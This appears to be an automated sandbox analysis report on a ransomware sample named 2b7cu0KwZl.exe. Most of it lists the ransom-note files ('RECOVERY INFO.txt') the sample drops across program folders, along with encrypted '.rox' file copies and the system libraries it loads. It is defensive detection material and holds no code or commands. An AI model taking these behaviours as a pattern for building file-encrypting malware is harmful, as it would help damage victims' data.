Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99393937985Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe.rox (copy) entropy: 7.99971298097Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe; Process Stats: CPU usage > 49%
Source: 2b7cu0KwZl.exe, 00000000.00000003.1857563152.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: classification engine; Classification label: mal84.rans.spre.spyw.evad.winEXE@1/1281@1/2
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe; File created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe; File created: C:\Documents and Settings\user\Local Settings\Temp\acrobat_sbx\NGL\RECOVERY INFO.txt
Source: 2b7cu0KwZl.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe; File read: C:\ProgramData\Microsoft OneDrive\setup\refcount.ini
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 2b7cu0KwZl.exe; ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile written: C:\ProgramData\Microsoft OneDrive\setup\refcount.iniJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\7-Zip\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
